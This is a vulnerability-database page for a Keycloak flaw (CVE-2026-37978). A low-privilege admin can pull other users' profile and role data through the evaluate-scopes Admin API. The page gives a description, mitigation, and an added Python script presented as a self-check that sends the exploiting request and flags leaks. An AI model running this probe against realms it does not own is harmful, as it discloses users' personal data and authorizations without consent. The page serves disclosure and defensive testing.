CVE-2026-37978
Description
A flaw was found in Keycloak. A low-privilege administrator with the 'view-clients' role can exploit this by invoking the 'evaluate-scopes' Admin API endpoints with an arbitrary user ID (userId) parameter. This vulnerability allows for cross-role personally identifiable information (PII) leakage, enabling unauthorized visibility into user identities and authorizations across the realm. Exploitation is possible remotely via network access to the Admin API.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Keycloak 26.4.11 and earlier allow low-privilege admins to leak arbitrary user PII via the evaluate-scopes Admin API due to missing user-view permission checks.
Vulnerability
A flaw exists in Keycloak (26.4.11 and earlier) where the evaluate-scopes Admin API endpoints accept an arbitrary userId parameter but only validate that the caller has the view-clients role. No call to auth.users().requireView() or equivalent user-view permission check is performed, as described in [4]. This allows a low-privilege administrator with only the view-clients role to invoke the endpoint and generate example tokens containing full profile and role data for any targeted user in the realm [1][4].
Exploitation
An attacker who is a low-privilege administrator with the view-clients role (and network access to the Admin API) can call the evaluate-scopes endpoint while supplying an arbitrary userId parameter. The server does not verify that the attacker is authorized to view that user's data, returning example tokens that include the targeted user's full identity and authorization information [1][4].
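The two sections above describe the same request: an evaluate-scopes call carrying a userId that the caller has no right to view. The script below is an added example for this page, not Keycloak code and not taken from any of the cited references. It lets a realm owner verify their own deployment with a deliberately low-privilege admin token (a service account or user holding only view-clients) and classifies the answer: a 403 means the user-view check is in place, a 200 whose example token names a different subject means the instance still leaks cross-user data. Assumptions, also marked in the code: the Admin REST path used here is the generate-example-access-token variant of the evaluate-scopes endpoints (the id-token and userinfo variants take the same userId parameter), an unknown userId is assumed to yield 404, the claim names checked are the usual OpenID profile claims, and the sample response bodies are constructed, not captured from a server.

```python
"""Probe for the CVE-2026-37978 authorization gap in Keycloak's evaluate-scopes
Admin API. Added illustrative code for this page; not Keycloak's own code.

Only run it against a realm you own. The network call is confined to probe();
build_url() and classify() are pure so they can be exercised offline.
"""
import json
import urllib.error
import urllib.parse
import urllib.request

# Assumption: Admin REST path of the example-access-token variant of the
# evaluate-scopes endpoints. generate-example-id-token and
# generate-example-userinfo take the same userId query parameter.
EVALUATE_PATH = ("admin/realms/{realm}/clients/{client_uuid}"
                 "/evaluate-scopes/generate-example-access-token")

# Assumption: these standard OpenID profile claims are what an example token
# carries for the targeted user; any of them for a foreign subject counts as PII.
PII_CLAIMS = ("sub", "preferred_username", "email", "name",
              "given_name", "family_name")


def build_url(base_url, realm, client_uuid, user_id, scope="openid"):
    """Build the evaluate-scopes URL that targets an arbitrary userId."""
    path = EVALUATE_PATH.format(
        realm=urllib.parse.quote(realm, safe=""),
        client_uuid=urllib.parse.quote(client_uuid, safe=""))
    query = urllib.parse.urlencode({"scope": scope, "userId": user_id})
    return f"{base_url.rstrip('/')}/{path}?{query}"


def classify(status, body, caller_sub):
    """Turn one response into a verdict.

    'forbidden'  -> a user-view check rejected the request (patched behaviour)
    'not-found'  -> assumption: the userId does not exist in the realm
    'leak'       -> 200 with identity or role claims for a subject other than
                    the caller, i.e. cross-user PII disclosure
    'no-pii'     -> 200 but nothing beyond the caller's own data
    'other'      -> anything else (non-JSON body, unexpected status)
    """
    if status == 403:
        return "forbidden"
    if status == 404:
        return "not-found"
    if status != 200:
        return "other"
    try:
        token = json.loads(body.decode("utf-8"))
    except (ValueError, UnicodeDecodeError):
        return "other"
    if not isinstance(token, dict):
        return "other"
    # Looking at your own example token is not a cross-user disclosure.
    if token.get("sub") == caller_sub:
        return "no-pii"
    leaked_claims = [claim for claim in PII_CLAIMS if token.get(claim)]
    realm_access = token.get("realm_access")
    roles = realm_access.get("roles") if isinstance(realm_access, dict) else None
    return "leak" if leaked_claims or roles else "no-pii"


def probe(base_url, realm, client_uuid, target_user_id, bearer_token,
          caller_sub, timeout=10):
    """Send the request with a view-clients-only admin token and classify it.

    Requires network access to the Admin API and a token you are authorised
    to use. bearer_token is the low-privilege admin's access token; caller_sub
    is that admin's own user id so self-lookups are not reported as leaks.
    """
    req = urllib.request.Request(
        build_url(base_url, realm, client_uuid, target_user_id),
        headers={"Authorization": f"Bearer {bearer_token}"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify(resp.status, resp.read(), caller_sub)
    except urllib.error.HTTPError as err:
        return classify(err.code, err.read(), caller_sub)


# Constructed sample body resembling an unpatched server's example token for
# a foreign user; not captured from a real deployment.
VULNERABLE_BODY = json.dumps({
    "sub": "2f7c1d2e-aaaa-bbbb-cccc-000000000001",
    "preferred_username": "alice",
    "email": "alice@example.org",
    "realm_access": {"roles": ["offline_access", "finance-approver"]},
}).encode("utf-8")

CALLER_SUB = "9e0d5b3a-dddd-eeee-ffff-000000000002"  # the probing admin's own id

if __name__ == "__main__":
    print(build_url("https://sso.example.org", "demo", "client-uuid", "target"))
    print(classify(200, VULNERABLE_BODY, CALLER_SUB))  # leak
    print(classify(403, b'{"error":"HTTP 403 Forbidden"}', CALLER_SUB))  # forbidden
```

In practice, call probe() once with a userId that is not your own and compare the verdict before and after upgrading to 26.4.12: a patched server should move from 'leak' to 'forbidden' for the same token.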
Impact
Successful exploitation results in cross-role personally identifiable information (PII) leakage, allowing unauthorized visibility into user identities and authorizations across the realm. The attacker gains information disclosure of sensitive user data, including profile attributes and role memberships, without needing any additional privileges [1][4].
Mitigation
Red Hat has released updated images and packages based on Keycloak 26.4.12, which fixes the vulnerability: Red Hat build of Keycloak 26.4.12 Images (RHSA-2026:19597) [2] and Red Hat build of Keycloak 26.4.12 packages (RHSA-2026:19596) [3]. Administrators should update to version 26.4.12 promptly. No workaround is provided in the available references; the fix requires upgrading the Keycloak instance. When assessing exposure, bear in mind that view-clients is also granted indirectly through broader composite roles such as manage-clients and realm-admin, so the set of accounts able to reach the endpoint is larger than the set holding view-clients directly.
AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products (1)
Patches (0)
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References (4)
News mentions (0)
No linked articles in our index yet.